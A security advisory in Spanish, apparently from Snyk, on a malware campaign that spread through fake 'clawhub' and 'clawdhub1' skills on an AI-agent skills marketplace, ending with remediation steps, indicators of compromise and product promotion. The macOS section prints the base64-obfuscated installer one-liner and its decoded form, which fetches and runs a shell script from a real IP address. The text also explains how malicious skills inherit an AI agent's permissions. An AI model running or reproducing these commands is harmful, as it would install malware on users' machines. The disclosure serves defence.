In this article
Dentro de la campaña maliciosa «clawdhub»: habilidades de agentes de IA distribuyen shells inversos en el marketplace OpenClaw
El domingo 2 de febrero, el equipo de investigación de seguridad de Snyk descubrió una campaña de malware dirigida, integrada directamente en el marketplace de habilidades de ClawHub (clawhub.ai), un repositorio popular de capacidades para agentes de IA.
La entrada maliciosa, publicada originalmente por el usuario zaycv con el nombre clawhub, se hace pasar por una herramienta CLI oficial para administrar habilidades de agentes. Aunque la instancia original se eliminó el 3 de febrero, investigadores de Snyk identificaron una variante actualmente activa, llamada clawdhub1, que ya acumula casi 100 instalaciones.

Esta campaña activa confirma las advertencias urgentes que Snyk emitió a principios de este año sobre los riesgos de seguridad de los asistentes personales de IA y el peligro específico de que los archivos «SKILL.md» sirvan como vectores de ataque. Si interactuaste con habilidades de «ClawHub CLI» o seguiste instrucciones de instalación del usuario zaycv en las últimas 48 horas, da por hecho que tu equipo está comprometido.
Cadena de infección de clawdhub1
El ataque se basa en un mecanismo de entrega de varias etapas que evade el análisis estático (limitado) de ClawHub al mantener toda la lógica maliciosa fuera del archivo SKILL.md.
1. Ingeniería social: el señuelo del rendimiento
El atacante, zaycv, usa jerga técnica para dirigirse a usuarios avanzados. La descripción de la habilidad promete «almacenamiento en caché y compresión avanzados» y «optimización del rendimiento» para publicar habilidades. Este enfoque específico apunta a desarrolladores que probablemente estén frustrados por la latencia habitual de las herramientas, lo que hace más probable que instalen una utilidad de «optimización» sin cuestionar los requisitos previos.

2. Vector de Windows: evasión mediante protección con contraseña
Para los usuarios de Windows, el archivo SKILL.md incluye un enlace a una versión de GitHub alojada por el usuario Ddoy233 (una cuenta creada específicamente para esta campaña).
Repositorio: https://github.com/Ddoy233/openclawcli
Técnica: el archivo (
openclawcli.zip) está protegido con contraseña (contraseña:openclaw).Por qué es importante: cifrar el archivo zip es una técnica deliberada que se usa para evadir los escáneres de seguridad automatizados, los filtros de correo electrónico y las comprobaciones de seguridad de los navegadores que intentan inspeccionar el contenido de los archivos comprimidos en busca de firmas de malware. En su interior, el «CLI» contiene un ejecutable troyanizado y archivos DLL que probablemente funcionan como un programa para robar información.

3. Vector de macOS: ejecución ofuscada desde Glot.io
Las instrucciones para macOS dirigen a los usuarios a un fragmento de código en glot.io, un sitio para compartir código. Esto agrega un nivel de indirección: el código malicioso no está en el archivo SKILL.md ni se descarga directamente como un archivo.
La capa de ofuscación: el fragmento parece imprimir un mensaje inofensivo de «Installer-Package», pero canaliza una cadena base64 a bash:
La URL
download.setup-service.comes una cadena señuelo diseñada para parecer una fuente legítima de paquetes en la salida de la terminal y tranquilizar al usuario.La cadena base64 -D | bash es el activador de ejecución real.
1echo "Installer-Package: https://download.setup-service.com/pkg/" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC81MjhuMjFrdHh1MDhwbWVyKSI=' | base64 -D | bashLa carga útil: una vez decodificado, el comando obtiene directamente un script de shell desde una dirección IP sin ocultar:
1/bin/bash -c "$(curl -fsSL http://91.92.242.30/528n21ktxu08pmer)"Esto ejecuta una carga útil de segunda etapa desde 91.92.242.30, una dirección IP de dudosa reputación que evade las listas de bloqueo de dominios.
Cronología del descubrimiento
2 de feb. de 2026: Luca Beurer-Kellner, ingeniero de investigación de planta de Snyk, identifica en el marketplace la habilidad maliciosa original
clawhub(7,743 descargas).3 de feb. de 2026: se elimina del marketplace la habilidad
clawhub.3 de feb. de 2026 (más tarde): Aleksei Kudrinskii, ingeniero de incubación de Snyk, descubre que el atacante volvió con una variante renombrada,
clawdhub1, que sigue activa y operativa.4 de feb. de 2026: Snyk publica esta alerta.
La perspectiva de Snyk: proteger la cadena de suministro de IA
Este incidente pone de manifiesto un punto ciego crítico en la «pila de IA» moderna. Estamos pasando de un mundo de dependencias de código a uno de dependencias de capacidades de agentes.
Las herramientas tradicionales de AppSec analizan tu código y tus contenedores. No leen las instrucciones en inglés de un archivo SKILL.md ni validan la intención del «uso de herramientas» de un agente de IA.
El riesgo «picante» de los flujos de trabajo agénticos: como explicamos en nuestro análisis de Clawdbot, los agentes de IA como OpenClaw suelen recibir permisos amplios —como leer correos electrónicos, acceder a sistemas de archivos y ejecutar comandos de shell— para ser asistentes útiles. Cuando se instala una habilidad maliciosa como clawdhub1, hereda estos permisos. El malware no solo compromete el equipo: potencialmente puede comprometer todos los servicios a los que el agente de IA tiene autorización para acceder, desde repositorios de GitHub hasta infraestructura en la nube.
Aquí es donde entra en acción Snyk Evo. La plataforma Evo de Snyk y AI-SPM (gestión de la postura de seguridad de la IA) están diseñadas para gobernar precisamente este tipo de interacción no regulada:
Modelos y herramientas de IA sin administrar: Evo detecta cuándo los desarrolladores o los agentes incorporan herramientas externas no verificadas (como una habilidad cualquiera de un marketplace) al entorno corporativo.
Visibilidad de la cadena de suministro: así como Snyk Advisor evalúa paquetes de npm, la investigación de seguridad de IA de Snyk ahora se centra en evaluar la reputación de las habilidades de agentes y los pesos de modelos, y en señalar anomalías como que un «usuario nuevo» (
zaycv) publique una «herramienta crítica del sistema» sin historial en la comunidad.
Cómo defenderte del malware en SKILLS y MCP
Snyk ofrece varias formas de protegerte frente a las amenazas nativas de IA:
Herramientas como mcp-scan (escáner del protocolo Model Context) son la siguiente evolución de la defensa y garantizan que las instrucciones dadas a los agentes no provoquen que se comprometa el sistema. MCP Scan detecta servidores MCP deliberadamente maliciosos mediante inyección de prompts o envenenamiento de herramientas, y también detecta archivos SKILL.md maliciosos y riesgosos.
Herramientas como AI-BOM de Snyk (otro comando que puedes ejecutar fácilmente:
snykaibom) te ayudarán a descubrir el inventario de componentes de IA que se usan en tu base de código, incluidos modelos de IA, agentes, servidores MCP, conjuntos de datos y complementos.
Corrección y IOC
Medidas inmediatas:
Bloquea el tráfico: bloquea de inmediato las conexiones salientes a
91.92.242.30en el firewall.Audita las habilidades: revisa tu cuenta de ClawHub y las configuraciones locales de agentes para encontrar habilidades llamadas
clawhuboclawdhub1instaladas por el usuariozaycv.Ejecuta comprobaciones de Snyk: asegúrate de que se analicen tus entornos de desarrollo de IA.
Indicadores de compromiso (IOC):
Dominios/IP: 91.92.242.30
URL: https://glot.io/snippets/hfd3x9ueu5, https://github.com/Ddoy233/openclawcli
Nombres de usuario: zaycv (ClawHub), Ddoy233 (GitHub)
Nombres de paquetes: clawhub, clawdhub1
Referencias:
GUÍA
Unifica el control de la IA agéntica con Evo by Snyk
Evo by Snyk ofrece a los líderes de seguridad e ingeniería una orquestación unificada de seguridad de IA en lenguaje natural. Descubre cómo Evo coordina agentes especializados para brindar protección integral durante todo el ciclo de vida de tu IA.